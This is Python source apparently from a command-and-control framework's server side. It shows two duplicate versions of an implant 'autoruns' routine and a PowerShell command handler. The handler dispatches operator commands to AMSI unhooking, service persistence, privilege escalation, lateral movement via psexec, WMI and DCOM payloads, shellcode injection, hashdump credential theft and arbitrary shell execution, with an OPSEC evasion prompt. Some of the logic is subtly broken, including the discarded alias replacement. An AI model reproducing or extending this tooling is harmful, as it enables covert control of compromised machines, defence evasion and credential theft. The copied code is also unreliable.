def autoruns(self): if "C#" in self.Pivot: new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI) new_task("loadmodule PwrStatusTracker.dll", "autoruns", self.RandomURI) update_mods("Stage2-Core.exe", self.RandomURI) update_mods("PwrStatusTracker.dll", self.RandomURI) new_task("loadpowerstatus", "autoruns", self.RandomURI) update_label("PSM", self.RandomURI) if "PS" in self.Pivot: new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI) update_mods("Stage2-Core.ps1", self.RandomURI) if "PBind Pivot" in self.Pivot: update_label("Parent: %s" % self.IPAddress, self.RandomURI) #new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress) update_mods("Stage2-Core.exe", self.RandomURI) elif "PB" in self.Pivot: update_label("Parent: %s" % self.IPAddress, self.RandomURI) #new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress) update_mods("Stage2-Core.exe", self.RandomURI) if "FC" in self.Pivot: update_label("Parent: %s" % self.IPAddress, self.RandomURI) new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI) update_mods("Stage2-Core.exe", self.RandomURI) result = get_autoruns() if result: for autorun in result: run_autoloads(autorun[1], self.RandomURI, "autoruns") new_task(autorun[1], "autoruns", self.RandomURI)
def autoruns(self): if "C#" in self.Pivot: new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI) update_mods("Stage2-Core.exe", self.RandomURI) if "PS" in self.Pivot: new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI) update_mods("Stage2-Core.ps1", self.RandomURI) result = get_autoruns() if result: for autorun in result: run_autoloads(autorun[1], self.RandomURI, "autoruns") new_task(autorun[1], "autoruns", self.RandomURI)
def handle_ps_command(command, user, randomuri, implant_id): try: check_module_loaded("Stage2-Core.ps1", randomuri, user) except Exception as e: print_bad("Error loading Stage2-Core.ps1: %s" % e) # alias mapping for alias in ps_alias: if command.startswith(alias[0]): command.replace(alias[0], alias[1]) command = command.strip() run_autoloads(command, randomuri, user) # opsec failures for opsec in ps_opsec: if opsec == command[:len(opsec)]: print_bad("**OPSEC Warning**") ri = input("Do you want to continue running - %s? (y/N) " % command) if ri.lower() == "n": command = "" if ri == "": command = "" break if command.startswith("unhook-amsi"): do_unhook_amsi(user, command, randomuri) return elif command.startswith("searchhelp"): do_searchhelp(user, command, randomuri) return elif command.startswith("download-files "): do_download_files(user, command, randomuri) return elif command.startswith("install-servicelevel-persistencewithproxy"): do_install_servicelevel_persistencewithproxy(user, command, randomuri) return elif command.startswith("install-servicelevel-persistence"): do_install_servicelevel_persistencewithproxy(user, command, randomuri) return elif command.startswith("remove-servicelevel-persistence"): do_remove_servicelevel_persistence(user, command, randomuri) return elif command.startswith("get-implantworkingdirectory"): do_get_implantworkingdirectory(user, command, randomuri) return elif command.startswith("get-system-withproxy"): do_get_system_withproxy(user, command, randomuri) return elif command.startswith("get-system-withdaisy"): do_get_system_withdaisy(user, command, randomuri) return elif command.startswith("get-system"): do_get_system(user, command, randomuri) return elif command.startswith("invoke-psexec ") or command.startswith( "invoke-smbexec "): do_invoke_psexec(user, command, randomuri) return elif command.startswith("invoke-psexecproxypayload "): do_invoke_psexecproxypayload(user, command, randomuri) return elif command.startswith("invoke-psexecdaisypayload "): do_invoke_psexecdaisypayload(user, command, randomuri) return elif command.startswith("invoke-psexecpayload "): do_invoke_psexecpayload(user, command, randomuri) return elif command.startswith("invoke-wmiexec "): do_invoke_wmiexec(user, command, randomuri) return elif command.startswith("invoke-wmijspbindpayload "): do_invoke_wmijsbindpayload(user, command, randomuri) return elif command.startswith("invoke-wmijsproxypayload "): do_invoke_wmijsproxypayload(user, command, randomuri) return elif command.startswith("invoke-wmijsdaisypayload "): do_invoke_wmijsdaisypayload(user, command, randomuri) return elif command.startswith("invoke-wmijspayload "): do_invoke_wmijspayload(user, command, randomuri) return elif command.startswith("invoke-wmiproxypayload "): do_invoke_wmiproxypayload(user, command, randomuri) return elif command.startswith("invoke-wmidaisypayload "): do_invoke_wmidaisypayload(user, command, randomuri) return elif command.startswith("invoke-wmipayload "): do_invoke_wmipayload(user, command, randomuri) return elif command.startswith("invoke-dcomproxypayload "): do_invoke_dcomproxypayload(user, command, randomuri) return elif command.startswith("invoke-dcomdaisypayload "): do_invoke_dcomdaisypayload(user, command, randomuri) return elif command.startswith("invoke-dcompayload "): do_invoke_dcompayload(user, command, randomuri) return elif command.startswith("invoke-runas "): do_invoke_runas(user, command, randomuri) return elif command.startswith("invoke-runasdaisypayload"): do_invoke_runasdaisypayload(user, command, randomuri) return elif command.startswith("invoke-runasproxypayload"): do_invoke_runasproxypayload(user, command, randomuri) return elif command.startswith("invoke-runaspayload"): do_invoke_runaspayload(user, command, randomuri) return elif command == "help": do_help(user, command, randomuri) return elif command.startswith("get-pid"): do_get_pid(user, command, randomuri) return elif command.startswith("upload-file"): do_upload_file(user, command, randomuri) return elif command == "kill-implant" or command == "exit": do_kill_implant(user, command, randomuri) return elif command.startswith("migrate"): do_migrate(user, command, randomuri) return elif command.startswith("loadmoduleforce"): do_loadmoudleforce(user, command, randomuri) return elif command.startswith("loadmodule"): do_loadmodule(user, command, randomuri) return elif command.startswith("pbind-loadmodule"): do_pbind_loadmodule(user, command, randomuri) return elif command.startswith("invoke-daisychain"): do_invoke_daisychain(user, command, randomuri) return elif command.startswith("inject-shellcode"): do_inject_shellcode(user, command, randomuri) return elif command == "listmodules": do_listmodules(user, command, randomuri) return elif command == "modulesloaded": do_modulesloaded(user, command, randomuri) return elif command == "ps": do_ps(user, command, randomuri) return elif command == "hashdump": do_hashdump(user, command, randomuri) return elif command == "stopdaisy": do_stopdaisy(user, command, randomuri) return elif command == "stopsocks": do_stopsocks(user, command, randomuri) return elif command == "sharpsocks": do_sharpsocks(user, command, randomuri) return elif command.startswith("reversedns"): do_reversedns(user, command, randomuri) return else: if command: do_shell(user, command, randomuri) return